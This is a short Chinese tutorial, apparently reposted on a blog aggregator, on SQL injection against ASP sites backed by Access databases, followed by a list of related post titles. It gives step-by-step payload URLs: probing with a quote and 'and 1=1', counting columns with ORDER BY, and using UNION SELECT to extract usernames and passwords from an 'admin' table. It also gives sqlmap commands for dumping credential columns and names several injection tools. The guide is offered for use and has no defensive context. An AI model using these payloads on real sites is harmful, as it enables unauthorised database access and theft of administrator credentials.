access注入及工具使用
来源:互联网 发布:东欧社会主义国家 知乎 编辑:程序博客网 时间:2024/05/16 15:30
Access数据结构:
Access数据库
表名
列名
数据
Access注入:
首先判断是否有注入点:
http://www.xxx.com/xxx.asp?id=166’(页面返回错误)
http://www.xxx.com/xxx.asp?id=166and 1=1(页面返回正常)
http://www.xxx.com/xxx.asp?id=166and 1=2 (页面返回错误)
Order by:
例如:http://www.xxx.com/xxx.asp?id=166order by 13 正常
http://www.xxx.com/xxx.asp?id=166order by 13错误
则代表查询的列名的数目有13个。
猜解表名 确定存在admin表名
http://www.xxx.com/xxx.asp?id=166 UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13 fromadmin
猜解列名 猜解数据
http://www.xxx.com/xxx.asp?id=166UNIONSELECT1,2,username ,4,5,6,7,password,9,10,11,12,13 from admin
工具使用:sqlmap 啊D 明小子 穿山甲。
工具功能性:支持数据库类型,支持get postcookie注入 注入突破类型 速度快等
例如:明小子
Sqlmap: 命令(Access数据库):sqlmap.py –u”url”--tebles (查询所有表名)
sqlmap.py –u”url” --dump -C”username,password”–T” User”
- access注入及工具使用
- Access数据库注入方法及防范
- access偏移注入及mssql,mysql注入技巧
- 使用sqlmap 代替access 注入中转
- ACCESS注入
- Access注入
- [转载]Python实现ASP+ACCESS注入的工具源代码
- SQL 注入工具 SQLIer使用
- SQL注入及SQLmap使用
- 注入工具中使用的SQL注入语句
- 小榕SQL注入工具使用
- sql注入与sqlmap工具使用
- SQL 注入之ACCESS
- ACCESS高级注入
- ACCESS高级注入教程
- Access注入语句大全
- access注入思路
- Access SQL注入参考
- React学习笔记--环境的基本配置!
- 第十周
- 认识三极管
- DES算法描述
- 二叉树10:最大二叉搜索子树
- access注入及工具使用
- 【python】解决urllib2乱码问题
- K
- JS闭包-02
- 在PhpStorm中使用git将项目上传到码云
- hihocoder 1121 : 二分图一•二分图判定
- Android adb 常用命令
- IE9对CSS3属性的支持情况
- Mac版tomcat下载安装启动